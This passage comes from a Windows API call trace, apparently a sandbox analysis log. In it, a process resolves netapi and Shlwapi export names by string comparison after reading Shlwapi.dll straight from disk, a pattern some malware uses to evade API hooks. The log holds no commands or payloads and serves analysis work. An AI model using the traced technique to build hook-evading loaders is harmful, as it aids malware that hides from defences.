(lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0235.231] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0235.237] GetProcessHeap () returned 0x560000 [0235.238] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x560000) returned 1 [0235.238] GetProcessHeap () returned 0x560000 [0235.238] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579290 [0235.238] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0235.239] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0235.239] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0235.239] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0235.239] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0235.240] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0235.240] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0235.240] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0235.240] GetProcessHeap () returned 0x560000 [0235.240] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x51148) returned 0x2db5030 [0235.240] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0235.240] ReadFile (in: hFile=0x17c, lpBuffer=0x2db5030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db5030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0235.244] CloseHandle (hObject=0x17c) returned 1 [0235.244] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0235.244] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0235.244] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0235.244] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0235.244] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0235.245] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0235.245] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0235.245] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0235.245] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0235.245] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0235.246] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0235.246] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0235.247] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0235.247] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0235.248] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0235.248] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0235.248] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0235.248] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0235.248] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0235.248] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0235.248] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0235.248] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0235.249] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0235.249] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0235.249] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0235.249] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0235.249] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0235.249] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0235.249] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0235.249] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0235.249] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0235.249] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0235.249] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0235.250] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0235.250] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0235.251] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0235.251] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0235.251] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0235.251] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0235.251] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0235.251] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0235.251] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0235.252] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0235.252] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0235.253] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0235.254] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0235.254] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0235.254] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0235.254] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0235.254] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0235.254] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 